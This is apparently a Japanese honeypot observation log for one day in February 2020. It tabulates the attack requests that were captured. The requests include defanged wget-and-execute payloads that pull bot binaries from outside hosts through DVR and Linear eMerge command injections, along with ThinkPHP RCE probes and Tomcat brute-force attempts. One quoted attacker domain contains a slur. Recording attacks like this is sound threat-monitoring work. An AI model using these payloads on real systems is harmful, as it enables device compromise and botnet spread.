WOWHoneypot観察(335日目)
2020/02/16(日)
トータルは455件でした。
ハンティングログは以下です。
111.255.162[.]17 wget+hxxp[:]//jhasdjahsdjasfkdaskdfasBOT[.]niggacumyafacenet[.]xyz/jaws |
36.236.140[.]165 wget+hxxp[:]//jhasdjahsdjasfkdaskdfasBOT[.]niggacumyafacenet[.]xyz/jaws |
www.virustotal.com
www.virustotal.com
85.33.36[.]165 wget hxxp[:]//switchnets[.]net/hoho.arm7 |
www.virustotal.com
www.virustotal.com
件数 | 概要 | リクエスト |
---|---|---|
374 | Tomcat管理ページに対するブルートフォース攻撃 | GET /manager/html |
47 | アクセス | GET / |
11 | 調査 | GET /is_test |
2 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php |
2 | MVPower DVRなどの脆弱性を狙った通信 | GET /shell?cd+/tmp;rm+-rf+*;wget+hxxp[:]//jhasdjahsdjasfkdaskdfasBOT.niggacumyafacenet.xyz/jaws;sh+/tmp/jaws |
2 | D-Linkルータの調査 | GET /HNAP1/ |
1 | Spring Data Commonsの脆弱性を狙った通信 | POST /users?page=&size=5 |
1 | 不正中継の調査 | HEAD hxxp[:]//123.125.114.144/ |
1 | 不正中継の調査 | GET hxxp[:]//www.123cha.com/ |
1 | 調査 | GET /script |
1 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 |
1 | 不正中継の試み | CONNECT www.ipip.net:443 |
1 | 不正中継の試み | CONNECT www.baidu.com:443 |
1 | 不正中継の試み | CONNECT ip.ws.126.net:443 |
1 | 不正中継の試み | CONNECT cn.bing.com:443 |
1 | phpunitの脆弱性を狙った通信 | POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
1 | Solrの調査 | GET /solr/admin/info/system?wt=json |
1 | Netgear ルータの脆弱性を狙った通信 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/¤tsetting.htm=1 |
1 | 調査 | GET /script |
1 | ThinkPHPの脆弱性を狙った通信 | GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP |
1 | Linear eMerge E3の脆弱性を狙った通信 | GET /card_scan_decoder.php?No=30&door=%60wget%20hxxp[:]//switchnets.net/hoho.arm7;%20chmod%20777%20hoho.arm7;%20./hoho.arm7%20linear%60 |
1 | ThinkCMFの脆弱性を狙った通信 | GET /?a=fetch&content= |
1 | リモートデバッグの調査 | GET /?XDEBUG_SESSION_START=phpstorm |